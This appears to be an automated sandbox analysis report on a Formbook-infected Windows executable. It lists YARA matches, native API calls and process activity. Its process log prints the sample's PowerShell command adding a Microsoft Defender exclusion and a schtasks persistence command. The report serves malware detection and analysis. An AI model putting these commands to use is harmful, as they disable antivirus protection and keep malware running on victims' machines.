Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Uses 32bit PE files
Source: vbc.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Yara signature match
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0295E970 0_2_0295E970
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0295E96C 0_2_0295E96C
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0295CF94 0_2_0295CF94
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCDD66 0_2_04FCDD66
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCD9C0 0_2_04FCD9C0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCEDB0 0_2_04FCEDB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCEE51 0_2_04FCEE51
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC4F49 0_2_04FC4F49
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FCF0C2 0_2_04FCF0C2
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC9CA8 0_2_04FC9CA8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_04FC9C98 0_2_04FC9C98
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041C130 8_2_0041C130
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041C9A5 8_2_0041C9A5
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041BABE 8_2_0041BABE
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00408C7B 8_2_00408C7B
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0041C4E6 8_2_0041C4E6
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00408C80 8_2_00408C80
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00402D87 8_2_00402D87
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017F0D20 8_2_017F0D20
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_017FF900 8_2_017FF900
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01814120 8_2_01814120
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018C1D55 8_2_018C1D55
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0180B090 8_2_0180B090
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018B1002 8_2_018B1002
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0182EBB0 8_2_0182EBB0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01816E30 8_2_01816E30
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B5C9A5 20_2_02B5C9A5
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B42FB0 20_2_02B42FB0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B48C80 20_2_02B48C80
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B48C7B 20_2_02B48C7B
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B42D90 20_2_02B42D90
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B42D87 20_2_02B42D87
Contains functionality to call native functions
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004185E0 NtCreateFile, 8_2_004185E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00418690 NtReadFile, 8_2_00418690
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_00418710 NtClose, 8_2_00418710
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004187C0 NtAllocateVirtualMemory, 8_2_004187C0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_004187C2 NtAllocateVirtualMemory, 8_2_004187C2
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018399A0 NtCreateSection,LdrInitializeThunk, 8_2_018399A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018395D0 NtClose,LdrInitializeThunk, 8_2_018395D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01839910
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839540 NtReadFile,LdrInitializeThunk, 8_2_01839540
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_018398F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839840 NtDelayExecution,LdrInitializeThunk, 8_2_01839840
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01839860
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01839780
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_018397A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839FE0 NtCreateMutant,LdrInitializeThunk, 8_2_01839FE0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839710 NtQueryInformationToken,LdrInitializeThunk, 8_2_01839710
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_018396E0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_01839A00
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A20 NtResumeThread,LdrInitializeThunk, 8_2_01839A20
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A50 NtCreateFile,LdrInitializeThunk, 8_2_01839A50
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01839660
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018399D0 NtCreateProcessEx, 8_2_018399D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018395F0 NtQueryInformationFile, 8_2_018395F0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839520 NtWaitForSingleObject, 8_2_01839520
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183AD30 NtSetContextThread, 8_2_0183AD30
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839950 NtQueueApcThread, 8_2_01839950
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839560 NtWriteFile, 8_2_01839560
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018398A0 NtWriteVirtualMemory, 8_2_018398A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839820 NtEnumerateKey, 8_2_01839820
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183B040 NtSuspendThread, 8_2_0183B040
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183A3B0 NtGetContextThread, 8_2_0183A3B0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839B00 NtSetValueKey, 8_2_01839B00
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183A710 NtOpenProcessToken, 8_2_0183A710
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839730 NtQueryVirtualMemory, 8_2_01839730
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839760 NtOpenProcess, 8_2_01839760
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839770 NtSetInformationFile, 8_2_01839770
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_0183A770 NtOpenThread, 8_2_0183A770
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A80 NtOpenDirectoryObject, 8_2_01839A80
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_018396D0 NtCreateKey, 8_2_018396D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839610 NtEnumerateValueKey, 8_2_01839610
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839A10 NtQuerySection, 8_2_01839A10
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839650 NtQueryValueKey, 8_2_01839650
Source: C:\Users\user\Desktop\vbc.exe Code function: 8_2_01839670 NtQueryInformationProcess, 8_2_01839670
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B58690 NtReadFile, 20_2_02B58690
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B587C0 NtAllocateVirtualMemory, 20_2_02B587C0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B58710 NtClose, 20_2_02B58710
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B585E0 NtCreateFile, 20_2_02B585E0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02B587C2 NtAllocateVirtualMemory, 20_2_02B587C2
Sample file is different than original file name gathered from version info
Source: vbc.exe Binary or memory string: OriginalFilename vs vbc.exe
Source: vbc.exe, 00000000.00000002.263973483.0000000000D39000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs vbc.exe
Source: vbc.exe, 00000000.00000002.267729856.0000000005CB0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameUI.dll@ vs vbc.exe
Source: vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameHResult.dll6 vs vbc.exe
Source: vbc.exe Binary or memory string: OriginalFilename vs vbc.exe
Source: vbc.exe, 00000008.00000002.344710455.0000000001A7F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
Source: vbc.exe, 00000008.00000002.344023750.000000000139A000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameHelp.Exej% vs vbc.exe
Source: vbc.exe Binary or memory string: OriginalFilenameICollecti.exeB vs vbc.exe
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: uZlkYhlkeLeaKC.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vbc.exe File read: C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: vbc.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uZlkYhlkeLeaKC" /XML "C:\Users\user\AppData\Local\Temp\tmpAA68.tmp Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Process created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Roaming\uZlkYhlkeLeaKC.exe Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe File created: C:\Users\user\AppData\Local\Temp\tmpAA68.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/8@14/6
Source: C:\Users\user\Desktop\vbc.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
